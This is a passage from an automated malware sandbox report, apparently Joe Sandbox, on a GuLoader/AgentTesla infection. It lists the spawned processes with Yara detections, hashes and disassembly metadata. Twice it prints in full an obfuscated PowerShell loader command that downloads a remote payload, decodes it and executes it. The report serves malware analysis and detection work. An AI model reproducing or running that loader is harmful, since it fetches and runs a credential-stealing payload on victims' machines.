                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;"
                                                                            Imagebase:0x7ff788560000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:10:11:55
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:10:11:57
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
                                                                            Imagebase:0x7ff639ed0000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:10:12:05
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;"
                                                                            Imagebase:0x730000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1995366811.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2006759213.000000000B869000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:10:12:06
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:10:12:22
                                                                            Start date:24/04/2024
                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                            Imagebase:0x380000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:10
                                                                            Start time:10:12:40
                                                                            Start date:24/04/2024
                                                                            Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                            Imagebase:0x620000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:10:12:41
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                            Imagebase:0x7ff643820000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:10:12:48
                                                                            Start date:24/04/2024
                                                                            Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                            Imagebase:0x620000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 00007FFD9B89CED6 Relevance: .5, Instructions: 474COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f2f525c4ac4d02eaca3f4128a2cef7e1b2f0d8bf7dac0bd8e770a518df360270
                                                                              • Instruction ID: 1e6e7a0286225d00be8f4914eb37eac990d63a42d4db0b58c49ce93abfe9c73b
                                                                              • Opcode Fuzzy Hash: f2f525c4ac4d02eaca3f4128a2cef7e1b2f0d8bf7dac0bd8e770a518df360270
                                                                              • Instruction Fuzzy Hash: E3F1C630A09A4D8FEFA8DF28D8557E97BD1FF58310F04426EE84DC7295DB34A9418B82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00007FFD9B89DC82 Relevance: .5, Instructions: 460COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8bd746cb04d2b0385ae94c468915304d0b96e7802cfc10cbc00688340e3a7234
                                                                              • Instruction ID: cc08b38c62c7fa625c023ab30fd81d1f34cf2c0240c86733a69bbf168563cb89
                                                                              • Opcode Fuzzy Hash: 8bd746cb04d2b0385ae94c468915304d0b96e7802cfc10cbc00688340e3a7234
                                                                              • Instruction Fuzzy Hash: FBE1D430A09A4D8FEFA8DF28C8657E97BD1FF58310F14426EE84DC76A5CE34A9458781
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00007FFD9B969CC9 Relevance: .5, Instructions: 482COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2287538195.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dd855273c6901005f8c4ac1ca03d8a2e99a234c895b60733ad4397fd2d6b272c
                                                                              • Instruction ID: 795de10fd5f21f699110ca829dd221f95639b5b3e16435395a64c439cd6ba082
                                                                              • Opcode Fuzzy Hash: dd855273c6901005f8c4ac1ca03d8a2e99a234c895b60733ad4397fd2d6b272c
                                                                              • Instruction Fuzzy Hash: 81E12932B1FA8E9FE7A5DBAC48785B47BD1EF59314B1A01BAD04DC71E3DA289D058301
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00007FFD9B964B35 Relevance: .4, Instructions: 446COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2287538195.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
